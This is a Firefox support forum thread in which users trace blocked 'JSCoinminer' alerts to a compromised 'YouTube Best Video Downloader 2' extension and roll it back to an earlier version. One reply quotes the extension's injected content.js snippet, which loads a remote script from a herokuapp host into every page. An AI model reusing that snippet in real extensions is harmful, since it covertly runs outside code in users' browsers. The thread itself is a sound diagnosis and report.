This site will have limited functionality while we undergo maintenance to improve your experience. If an article doesn't solve your issue and you want to ask a question, we have our support community waiting to help you at @FirefoxSupport on Twitter and/r/firefox on Reddit.

Search Support

Avoid support scams. We will never ask you to call or text a phone number or share personal information. Please report suspicious activity using the “Report Abuse” option.

Learn More

Web Attacker: JSCoinminer Download 8 (Symantec Description Name)

  • 6 replies
  • 5 have this problem
  • 23 views
  • Last reply by Shadow110

more options

As of today, 3/24/18, I keep getting web attacks with FIrefox on all websites visited, attacks which are being blocked by my firewall, Symantec's "Norton Security":

Intrusion type: "JSCoinminer Download 8", as per Symantec's description Attacker URL: thrillingos.herokuapp.com/mozilla/best-ytb-down/content/analytics

Happens through: "C:\ Program Files (x86)\Mozilla Firefox\firefox.exe", although I use a 64-bit version of Firefox on Windows 7 (SP1), 64-bit.

Since it has "Mozilla" in the URL, does Mozilla know anything about this?

Happens on ALL websites, including, but not limited to, www.nytimes.com , www.washingtonpost.com. , support/mozilla.org/

Another post suggested a Firefox add-on causing the problem, but all add-ons listed in Firefox are ones I have been using for a least a year, and originally came from the selection offered by Mozilla. Does Mozilla know if any of these have been compromised: AdBlocker Ultimate, Ghostery, HTTPS Everywhere, Video DownloadHelper, YouTube Best Video Downloader 2

As of today, 3/24/18, I keep getting web attacks with FIrefox on all websites visited, attacks which are being blocked by my firewall, Symantec's "Norton Security": Intrusion type: "JSCoinminer Download 8", as per Symantec's description Attacker URL: thrillingos.herokuapp.com/mozilla/best-ytb-down/content/analytics Happens through: "C:\ Program Files (x86)\Mozilla Firefox\firefox.exe", although I use a 64-bit version of Firefox on Windows 7 (SP1), 64-bit. Since it has "Mozilla" in the URL, does Mozilla know anything about this? Happens on ALL websites, including, but not limited to, www.nytimes.com , www.washingtonpost.com. , support/mozilla.org/ Another post suggested a Firefox add-on causing the problem, but all add-ons listed in Firefox are ones I have been using for a least a year, and originally came from the selection offered by Mozilla. Does Mozilla know if any of these have been compromised: AdBlocker Ultimate, Ghostery, HTTPS Everywhere, Video DownloadHelper, YouTube Best Video Downloader 2

Modified by DG

Chosen solution

I did as you suggested, and installed and enabled the previous 8.5 version, with updates disabled. As a result, I'm NOT getting the attack messages now from my Symantec firewall like I did when the newer version of the add-on was installed.

I also posted a message about the problem on the add-on's review page, and sent a message to Mozilla through the feedback option there. Another person had also posted, in German, a warning on the review page about the attacking URL.

Thank you for your quick and helpful response in all this. It is much appreciated.

Read this answer in context 👍 1

All Replies (6)

more options

degnmozilla said

Another post suggested a Firefox add-on causing the problem, but all add-ons listed in Firefox are ones I have been using for a least a year, and originally came from the selection offered by Mozilla. Does Mozilla know if any of these have been compromised: AdBlocker Ultimate, Ghostery, HTTPS Everywhere, Video DownloadHelper, YouTube Best Video Downloader 2

Test by disabling half of them and seeing whether anything changes. If problems continue, try the other half.


Could you check for alien script files in your Firefox program folder? In particular, in these locations (varies for 32-bit / 64-bit):

  • C:\Program Files\Mozilla Firefox\defaults\pref
  • C:\Program Files (x86)\Mozilla Firefox\defaults\pref

Caution: Do not double-click script files! The default action for a script file it to execute as a Windows system script. (Typically this would just not work, but why risk it.)

Make sure Windows is showing hidden files: https://support.microsoft.com/en-us/help/14201/windows-show-hidden-files

A file named channel-prefs.js is normal. Any other file in this folder is suspicious. Remove any such files to a neutral location for further analysis at your leisure.

Changes here would take effect at your next startup.

more options

By disabling "YouTube Best Video Downloader 2" the attacks stopped. Disabling the other add-ons listed above made no difference.

Right now I'm leaving "YouTube Best Video Downloader 2" disabled, and will continued to monitor whether that fixes the problem for good.

If this particular add-on is compromised, I would hope Mozilla would contact the developer about the problem. Also, if it is ever fixed, I would appreciate hearing that it is safe to use, again.

Thank you for your response above.

more options

As to your other suggest above, only "channel-prefs.js" is located in the directory you indicated, with "hidden files" showing.

more options

I don't know why the extension uses that "attacker URL". When I submit that script to VirusTotal, there are 3 detections out of 58, so it's not clear whether it's really dangerous or just looks suspiciously similar to something else:

https://www.virustotal.com/#/file/af5653f205bec5784c015cf0ea5bc3dd86824496ff41c9a626a34bb11bcfe74f/detection

It seems intended to do some kind of global logging of certain activity in pages:

/content_script/content.js:

//code to log event
(function(){
	var logContentEvent = document.createElement('script'); 
	logContentEvent.src = 'https://thrillingos.herokuapp.com/mozilla/best-ytb-down/content/analytics'; 
	document.body.appendChild(logContentEvent);
})(); 

This content.js script seems to be new in the latest release (March 17th). The only explanation of the change is:

" improved analytics to serve better"

To serve whom better?!

If you want to use this extension, you could roll back to the March 15th release. Here's how:

(1) Disable auto-updating for this extension

On the Add-ons page, click the "More" link for the extension and scroll down to the row with the Automatic Updates line (Default On Off Check for Updates) and click Off.

This should be saved without any need to click a Save button.

(2) Go to the extension's "Versions" page and install 8.5, the immediately previous version:

https://addons.mozilla.org/firefox/addon/youtube-download-mp3-mp4-1080p/versions/

As shown in the attached screenshot, the suspicious file does not exist in the earlier version.

Or if you no longer trust this add-on developer, you could just leave it disabled or remove it.

more options

Chosen Solution

I did as you suggested, and installed and enabled the previous 8.5 version, with updates disabled. As a result, I'm NOT getting the attack messages now from my Symantec firewall like I did when the newer version of the add-on was installed.

I also posted a message about the problem on the add-on's review page, and sent a message to Mozilla through the feedback option there. Another person had also posted, in German, a warning on the review page about the attacking URL.

Thank you for your quick and helpful response in all this. It is much appreciated.

more options

Hi, glad got things figured out. Please Mark the Answer with the Solution as Solved.